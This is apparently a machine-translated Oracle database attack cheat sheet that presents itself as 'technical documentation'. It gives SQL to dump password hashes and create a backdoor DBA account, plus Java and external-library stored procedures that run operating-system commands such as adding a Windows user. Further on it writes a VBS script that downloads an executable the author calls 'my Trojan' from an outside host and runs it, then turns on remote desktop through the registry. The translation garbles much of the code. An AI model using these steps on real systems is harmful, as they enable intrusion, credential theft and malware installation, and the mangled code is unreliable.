Oracle Technical Documentation

Author: Robert

Used with the open Tool
Part 1

Basic query command
Select * from V $ PWFILE_USERS // view dba users
Select * from v $ version // view the oracle version and System version
Select * from session_privs; // view the permissions of the current user
Select * from user_role_privs \ QUERY the current user role
Select * from user_sys_privs \ QUERY the current user's system Permissions

Select username, password from dba_users; // view all user password hash
Select * from dba_sys_privs where grantee = SYSTEM; \ Query SYSTEM Permissions
Grant select any dictionary to system with admin option; \ this permission is required when you cannot log on to the OEM.
Select name, password FROM user $ Where name = SCOTT; // view the password of a single user in earlier versions
Select username, decode (password, NULL, NULL, password) password FROM dba_users; // view User hash
Create user bob identified by iloveyou; \ create user bob password iloveyou
Grant dba to bob; \ grant bob DBA Permissions
Grant execute on xmldom to bob \ to grant the User execute
Create ROLE "javauserpriv" NOT IDENTIFIED
Create ROLE "policyspriv" not identified \ when the prompt role policyspriv does not exist is used
Select grantee from dba_role_privs where granted_role = DBA; \ check that those users have DBA Permissions
Select * from dba_directories; \ view the directory where the path is located

Part 2: create java and execute system commands

No.1

Create or replace library exec_shell AS c: windowssystem32msvcrt. dll;
/
Show errors
Create or replace package when md is procedure exec (character string in char );
End transaction md;
/
Show errors
Create or replace package body already MD IS
PROCEDURE exec (Response string in char)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
Language c;
End transaction md;
/
Show errors: no echo above

If not, use the following

Create or replace library exec_shell AS $ ORACLE_HOMEmsvcrt.dll;
/
Show errors
Create or replace package when md is procedure exec (character string in char );
End transaction md;
/
Show errors
Create or replace package body already MD IS
PROCEDURE exec (Response string in char)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
Language c;
End transaction md;
/
After show errors is executed
Run

Exec cmdmd.exe c (net1 user robert iloveyou/add); no2.

Create or replace and compile java source named "Host"
Import java. io .*;
Public class Host {
Public static void executeCommand (String command ){
Try {
String [] finalCommand;
If (isWindows ()){
FinalCommand = new String [4];
// Use the appropriate path for your windows version.
FinalCommand [0] = "C: \ windows \ system32 \ cmd.exe"; // Windows XP/2003
// FinalCommand [0] = "C: \ winnt \ system32 \ cmd.exe"; // Windows NT/2000
FinalCommand [1] = "/y ";
FinalCommand [2] = "/c ";
FinalCommand [3] = command;
}
Else {
FinalCommand = new String [3];
FinalCommand [0] = "/bin/sh ";
FinalCommand [1] = "-c ";
FinalCommand [2] = command;
}

Final Process pr = runtime.getruntime(cmd.exe c (finalCommand );
Pr. waitFor ();

New Thread (new Runnable (){
Public void run (){
BufferedReader br_in = null;
Try {
Br_in = new BufferedReader (new InputStreamReader (pr. getInputStream ()));
String buff = null;
While (buff = br_in.readLine ())! = Null ){
System. out. println ("Process out:" + buff );
Try {Thread. sleep (100);} catch (Exception e ){}
}
Br_in.close ();
}
Catch (IOException ioe ){
System. out. println ("Exception caught printing process output .");
Ioe. printStackTrace ();
}
Finally {
Try {
Br_in.close ();
} Catch (Exception ex ){}
}
}
}). Start ();

New Thread (new Runnable (){
Public void run (){
BufferedReader br_err = null;
Try {
Br_err = new BufferedReader (new InputStreamReader (pr. getErrorStream ()));
String buff = null;
While (buff = br_err.readLine ())! = Null ){
System. out. println ("Process err:" + buff );
Try {Thread. sleep (100);} catch (Exception e ){}
}
Br_err.close ();
}
Catch (IOException ioe ){
System. out. println ("Exception caught printing process error .");
Ioe. printStackTrace ();
}
Finally {
Try {
Br_err.close ();
} Catch (Exception ex ){}
}
}
}). Start ();
}
Catch (Exception ex ){
System. out. println (ex. getLocalizedMessage ());
}
}

Public static boolean isWindows (){
If (System. getProperty ("OS. name"). toLowerCase (). indexOf ("windows ")! =-1)
Return true;
Else
Return false;
}

};
/
Create or replace procedure host_command (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME Host.exe cuteCommand (java. lang. String );
/
EXEC DBMS_JAVA.grant_permission (SYSTEM, java. io. FilePermission, <>, read, write, execute, delete );
EXEC Dbms_Java.Grant_Permission (SYSTEM, SYS: java. lang. RuntimePermission, writeFileDescriptor ,);
EXEC Dbms_Java.Grant_Permission (SYSTEM, SYS: java. lang. RuntimePermission, readFileDescriptor ,);
/
DECLARE
Rochelle output DBMS_OUTPUT.chararr;
Rochelle lines INTEGER: = 1000;
BEGIN
DBMS_OUTPUT.enable (1000000 );
DBMS_JAVA.set_output (1000000 );

Host_command (dir C :);

DBMS_OUTPUT.get_lines (l_output, l_lines );
END; pay attention to two points
Pay attention to the system path under win
Note that win is commented out in linx.
The last sentence is the Command Execution
Host_command (dir C :);

No3.

Create or replace and compile
Java souRCe named "util"
As
Import java. io .*;
Import java. lang .*;
Public class util extends Object
{
Public static int RunThis (String args)
{
Runtime rt = Runtime. getRuntime ();
Int RC =-1;
Try
{
Process p = rt.exe c (args );
Int bufSize = 4096;
BufferedInputStream bis = new BufferedInputStream (p. getInputStream (), bufSize );
Int len;
Byte buffer [] = new byte [bufSize];
// Echo back what the program spit out
While (len = bis. read (buffer, 0, bufSize ))! =-1)
System. out. write (buffer, 0, len );
RC = p. waitFor ();
}
Catch (Exception e)
{
E. printStackTrace ();
RC =-1;
}
Finally
{
Return RC;
}
}
}
/
Create or replace
Function RUN_CMz (p_cmd in varchar2) return number
As
Language java
Name util. RunThis (java. lang. String) return integer;
/
Create or replace procedure RC (p_cmd in varChar)
As
X number;
Begin
X: = RUN_CMz (p_cmd );
End;
/
Variable x number;
Set serveroutput on;
Exec dbms_java.set_output (100000 );
Grant policyspriv to system;

Grant policyspriv to system

Exec: x: = run_cmz (ipconfig); the second part is about operating disk files.
No1.
Create directory

Create or replace directory DIR as C:; this directory can also be the startup directory.

Authorization

Grant read, write on directory DIR to system does not need to be used in this step
Then execute the operation
Write files

Declare
File utl_file.file_type;
Begin
File: = utl_file.fopen (DIR, test. vbs, W );
Utl_file.put_line (file, Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http: // blog.cnmoker.org/rad.exe", 0
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile "c: ad.exe", 2 );
Utl_file.fflush (file );
Utl_file.fclose (file );
End;
/
Exec: x: = run_cmz (cscript c: est. vbs );
/
Exec: x: = run_cmz (c: ad.exe); in this step, download my Trojan to drive c and execute

Declare
File utl_file.file_type;
Begin
File: = utl_file.fopen (DIR, 3389.vbs, W );
Utl_file.put_line (file, Dim OperationRegistry
Set OperationRegistry = WScript. createObject ("WScript. Shell ")
Dim TSPort, TSState, TSRegPath
TSRegPath = "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber"
TSPort = OperationRegistry. RegRead (TSRegPath)
TSRegPath = "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerfDenyTSConnections"
TSState = OperationRegistry. RegRead (TSRegPath)
If TSState = 0 Then
Else
OperationRegistry. RegWrite TSRegPath, 0, "REG_DWORD"
End If );
Utl_file.fflush (file );
Utl_file.fclose (file); <